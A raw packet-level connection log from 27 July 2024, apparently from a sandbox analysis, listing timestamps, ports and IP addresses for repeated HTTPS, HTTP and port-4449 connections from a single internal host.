Jul 27, 2024 07:45:44.164140940 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:44.164515972 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:44.164537907 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:44.774251938 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:44.774360895 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:44.777157068 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:44.777211905 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:44.777277946 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:44.777290106 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:44.777576923 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:44.777725935 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:44.820574045 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:46.118031025 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:46.118215084 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:46.118288994 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:46.164545059 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:46.164612055 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:46.164648056 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:46.164665937 CEST	443	62354	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:46.262928963 CEST	4449	62342	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:46.263148069 CEST	62342	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:46.273581028 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:46.273674965 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:46.273772001 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:46.274141073 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:46.274173975 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:46.947361946 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:46.947462082 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:46.952341080 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:46.952372074 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:46.952431917 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:46.952441931 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:46.952733994 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:46.952857018 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:46.996545076 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:47.925029039 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:47.925111055 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:47.925174952 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:47.938931942 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:47.938981056 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:47.939009905 CEST	62355	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:47.939026117 CEST	443	62355	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:48.054898977 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:48.054984093 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:48.055454016 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:48.055542946 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:48.055560112 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:48.640261889 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:48.640446901 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:48.643075943 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:48.643130064 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:48.643230915 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:48.643244028 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:48.643388987 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:48.643654108 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:48.643738985 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:49.274257898 CEST	62342	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:49.274518013 CEST	62357	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:49.585505962 CEST	62342	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:50.151191950 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:50.151287079 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:50.151470900 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:50.153503895 CEST	4449	62342	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:50.153532028 CEST	4449	62357	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:50.153547049 CEST	4449	62342	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:50.153625011 CEST	62342	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:50.153680086 CEST	62357	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:50.154061079 CEST	62357	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:50.160178900 CEST	4449	62357	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:50.165175915 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:50.165175915 CEST	62356	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:50.165241003 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:50.165277004 CEST	443	62356	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:50.275039911 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:50.275120020 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:50.275193930 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:50.275544882 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:50.275582075 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:50.857728958 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:50.857952118 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:50.860398054 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:50.860450983 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:50.860533953 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:50.860547066 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:50.860853910 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:50.861031055 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:50.904582977 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:52.484374046 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:52.484564066 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:52.484657049 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:52.497704983 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:52.497704983 CEST	62358	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:52.497770071 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:52.497805119 CEST	443	62358	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:52.601716042 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:52.601828098 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:52.601908922 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:52.602452040 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:52.602535009 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:53.271967888 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:53.272208929 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:53.274604082 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:53.274632931 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:53.274693966 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:53.274705887 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:53.274982929 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:53.275209904 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:53.316579103 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:54.187758923 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:54.188621044 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:54.188685894 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:54.203798056 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:54.203866959 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:54.203921080 CEST	62359	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:54.203938961 CEST	443	62359	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:54.304872036 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.304954052 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.305248022 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.305604935 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.305686951 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.902610064 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.902798891 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.905359030 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.905375957 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.905425072 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.905431032 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.905474901 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.905479908 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.905595064 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.905723095 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:54.948574066 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:54.950915098 CEST	62361	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:45:54.958832979 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:54.958973885 CEST	62361	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:45:54.959021091 CEST	62361	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:45:54.959036112 CEST	62361	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:45:54.963989973 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:54.964005947 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:56.071402073 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:56.071419954 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:56.071427107 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:56.071585894 CEST	62361	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:45:56.071681976 CEST	62361	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:45:56.305123091 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:56.305332899 CEST	62361	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:45:56.305783987 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:56.305850029 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:56.306041002 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:56.309951067 CEST	80	62361	154.144.253.197	192.168.2.4
Jul 27, 2024 07:45:56.320956945 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:56.320957899 CEST	62360	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:56.321023941 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:56.321059942 CEST	443	62360	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:56.429893970 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:56.429979086 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:56.430219889 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:56.430629969 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:56.430711031 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:57.024276972 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:57.024458885 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:57.026447058 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:57.026499987 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:57.026565075 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:57.026577950 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:57.026716948 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:57.026987076 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:57.072573900 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:58.282339096 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:58.282407045 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:58.282548904 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:58.300756931 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:58.300757885 CEST	62362	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:58.300789118 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:58.300807953 CEST	443	62362	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:58.414077997 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:58.414160013 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:58.414269924 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:58.414853096 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:58.414932966 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:59.447253942 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:59.447455883 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:59.450018883 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:59.450073004 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:59.450143099 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:59.450155973 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:59.450304985 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:59.450550079 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:59.492571115 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:00.429241896 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:00.429306030 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:00.429359913 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:00.443507910 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:00.443507910 CEST	62363	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:00.443542004 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:00.443559885 CEST	443	62363	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:00.554733038 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:00.554814100 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:00.554925919 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:00.555373907 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:00.555454969 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:01.168488979 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:01.168590069 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:01.170948029 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:01.171000957 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:01.171067953 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:01.171081066 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:01.171238899 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:01.171489954 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:01.171574116 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:02.419689894 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:02.419771910 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:02.419841051 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:02.435535908 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:02.435535908 CEST	62364	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:02.435599089 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:02.435642004 CEST	443	62364	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:02.539122105 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:02.539201021 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:02.539300919 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:02.539786100 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:02.539866924 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:03.474306107 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:03.474463940 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:03.476598024 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:03.476649046 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:03.476819038 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:03.476833105 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:03.477211952 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:03.477468967 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:03.477551937 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:04.485040903 CEST	62366	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:04.491034031 CEST	80	62366	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:04.491189957 CEST	62366	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:04.491275072 CEST	62366	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:04.491300106 CEST	62366	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:04.496402979 CEST	80	62366	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:04.496433020 CEST	80	62366	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:04.660322905 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:04.660550117 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:04.660639048 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:04.674849987 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:04.674850941 CEST	62365	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:04.674916983 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:04.675005913 CEST	443	62365	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:04.789103031 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:04.789176941 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:04.789249897 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:04.789608955 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:04.789638996 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:05.361193895 CEST	80	62366	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:05.361248016 CEST	80	62366	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:05.361377954 CEST	62366	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:05.361488104 CEST	62366	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:05.366600037 CEST	80	62366	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:05.474621058 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:05.474728107 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:05.476955891 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:05.476974964 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:05.477031946 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:05.477042913 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:05.477330923 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:05.477466106 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:05.520553112 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:06.510704041 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:06.510850906 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:06.510932922 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:06.525625944 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:06.525672913 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:06.525702000 CEST	62367	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:06.525717974 CEST	443	62367	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:06.632886887 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:06.632930994 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:06.633141994 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:06.633598089 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:06.633637905 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:07.238785028 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:07.238939047 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:07.241199017 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:07.241254091 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:07.241326094 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:07.241338968 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:07.241635084 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:07.242335081 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:07.288572073 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:08.598711014 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:08.598802090 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:08.599055052 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:08.614422083 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:08.614422083 CEST	62368	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:08.614454031 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:08.614470959 CEST	443	62368	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:08.726823092 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:08.726862907 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:08.727037907 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:08.727293015 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:08.727318048 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:09.329283953 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:09.329353094 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:09.331743002 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:09.331752062 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:09.331794977 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:09.331799984 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:09.331840038 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:09.331845045 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:09.332084894 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:09.332191944 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:09.372577906 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:10.785878897 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:10.785937071 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:10.785994053 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:10.800014973 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:10.800015926 CEST	62369	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:10.800048113 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:10.800065994 CEST	443	62369	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:10.914086103 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:10.914151907 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:10.914220095 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:10.914575100 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:10.914608002 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:11.528136015 CEST	4449	62357	193.222.96.24	192.168.2.4
Jul 27, 2024 07:46:11.528341055 CEST	62357	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:46:11.568496943 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:11.568701029 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:11.571376085 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:11.571400881 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:11.571450949 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:11.571460962 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:11.571625948 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:11.571743011 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:11.616533041 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:12.551805019 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:12.551863909 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:12.551954031 CEST	62370	443	192.168.2.4	167.235.128.153
